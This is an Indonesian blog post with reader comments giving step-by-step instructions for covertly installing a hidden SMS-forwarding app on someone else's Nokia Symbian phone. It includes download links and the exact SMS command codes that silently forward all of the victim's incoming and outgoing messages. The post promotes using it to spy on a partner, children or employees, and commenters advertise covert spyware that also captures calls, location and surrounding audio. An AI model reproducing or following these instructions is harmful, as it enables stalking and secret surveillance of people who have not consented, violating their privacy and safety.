Cara Menyadap Handphone Orang Lain




Cara Menyadap Handphone Orang Lain


Pernahkah kamu berpikir untuk menyadap HP orang-orang terdekat kamu, mungkin untuk alasan keamanan atau sekedar ingin tau tentang apa saja sebenarnya yang dilakukannya dibelakangmu bersama teman-teman sms-annya?

menyadap handphone
Mungkin kamu berpikir hal itu tidak mungkin, atau mungkin dilakukan namun dengan teknik dan perangkat penyadap HP yang mahal dan susah didapatkan. Namun, taukah kamu, bahwa ada cara sederhana untuk menyadap HP orang lain dengan aplikasi dan cara yang sangat mudah dan murah, bahkan gratis. Mau tau?

Trik berikut ini dapat kamu gunakan untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh, mengawasi penggunaan HP oleh anak anda, atau mengontrol komunikasi anak buah/karyawan dalam perusahaan anda.

penyadap HP
Pesan Alat Penyadap di 2mata.net

Syarat yang dibutuhkan:

# HP adalah HP symbian. Baik HP anda maupun HP teman anda (target).
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis
(hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis)

Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :

1. download smsanywherelite.sis (Buka aja di http://7c3e65c9.linkbucks.com/?lurl=http%3A%2F%2Fwww.wireless-labs.com%2Fdownload%2FSmsAnywhere_S60_2_0_v_1_4_1.SIS)

kalau tidak bisa disitu, silahkan download di http://www.ziddu.com/download/3233238/smsanywherelite_s60_2_0_v_1_1_0.sis.zip.html

2. Masukkan aplikasi symbian itu di HP anda dan juga di HP calon korban/target.

3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. 
Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain.

(Inilah keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut)

4. Siapkan hp/ponsel korban anda

5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.

6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0

8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya.

Selamat mencoba, semoga trik Menyadap Handphone Orang Lain ini dapat bermanfaat.

*****
Ref: duniaspy.com, romannurbawa.wordpress.com







Ada 19 komentar untuk artikel Cara Menyadap Handphone Orang Lain

Anonim mengatakan...

gan
type hp nokia p ja ne yg bs dsadap??
thkz

www.wahyu-winoto.com on Senin, 19 September 2011 16.31.00 WIB mengatakan...

@ Anonim : Hampir semua tipe HP Nokia yg udah ada MMC-nya bisa dipasang aplikasi ini. Tp sy blm pernah nyoba di HP-HP nokia versi-versi terbaru. Silahkan kamu coba sendiri.

Rupa-rupa segalada on Minggu, 16 Oktober 2011 18.45.00 WIB mengatakan...

via hp Blackberry bisa ga

www.wahyu-winoto.com on Senin, 17 Oktober 2011 14.49.00 WIB mengatakan...

@ rupa-rupa : saya blm nyoba di BB. kayaknya gak bisa, cz bb kan platformnya lain.

story wanda tams on Jumat, 18 November 2011 11.15.00 WIB mengatakan...

mantap nie infonya

furniture-jati on Jumat, 25 November 2011 19.51.00 WIB mengatakan...

makasi infonya bosss,,,
mantap...

sumur bor on Senin, 05 Desember 2011 10.14.00 WIB mengatakan...

mau nyoba tapi takut ketauan klo nyadap..

Leo on Kamis, 22 Desember 2011 20.13.00 WIB mengatakan...

beli aja fitur lengkapnya di www.penyadap.com

renovasi rumah on Senin, 23 Januari 2012 12.21.00 WIB mengatakan...

canggih bgt niy

Anonim mengatakan...

gan cara masukin aolikasi symbian gimana?
langsung ketik aja SA 123456 ON atau ad cara lain?
dan password standard nya apa gan?
123456 atau ad password yg laen?

Promo Indonesia on Minggu, 04 Maret 2012 22.53.00 WIB mengatakan...

menarik gan ulasan artikelnya
ijin nyedot dulu

Anonim mengatakan...

di hp cina bisa ga, kays.nexian

wildan cheater on Kamis, 03 Mei 2012 17.20.00 WIB mengatakan...

gan kalo mau nyadap telefon gimana

Anonim mengatakan...

klu untuk hp bb bisa gx?

batara on Minggu, 13 Mei 2012 18.18.00 WIB mengatakan...

makasih bos info nya

Bagus Anto on Jumat, 01 Juni 2012 18.17.00 WIB mengatakan...

Asyk tu kyaknya,
nyoba ah

valentino_echa on Jumat, 15 Juni 2012 00.32.00 WIB mengatakan...

Jual penyadap handphone segala merk yg ber-OS. Kondisi software bekas (second) sudah terpakai 5 bulan dan terbukti sukses...Bisa SADAP :

- SMS

- Percakapan

- Lokasi (klo support gps)

- BBM

- Sadap suara sekitar

- Dapat web account

- Tidak terdeteksi

- Notifikasi bila ganti sim card

- Bisa dipindah ke HP lain

harga 2 jeti nego tipis...bandingkan dengan harga penyadap yang lainnya!

hp : 085736025570 (sms only)

pin : 27eb3dfa

2mata.net on Jumat, 06 Juli 2012 11.16.00 WIB mengatakan...

Banyak yang bingung setelah download koq software nya gak jalan..bisa jadi karena type hp nya gak support.
saran saya biar gak repot dan ribet, langsung aja download aplikasi nya di http://www.2mata.net
Dijamin anda dapat menyadap type handphone apapun. garansi klo software gak running well. bisa sadap SMS, BBM, call, GPS, mendengar percakapan target,mendengar suara disekeliling hp target, melihat langsung secara real time apa yg ada di hp target dll
monggo silahken….

penyadap hp on Selasa, 02 Oktober 2012 11.04.00 WIB mengatakan...

Banyak yang bingung setelah download koq software nya gak jalan..
saran saya biar gak repot dan ribet, langsung aja download aplikasi nya di http://www.2mata.net
Dijamin anda dapat menyadap type handphone apapun. garansi klo software gak running well. bisa sadap sms,bbm,call,mendengar percakapan target, melihat langsung secara real time apa yg ada di hp target.
monggo silahken….


Poskan Komentar

Related Posts Plugin for WordPress, Blogger...
 


garis hitam panjang
garis hitam panjang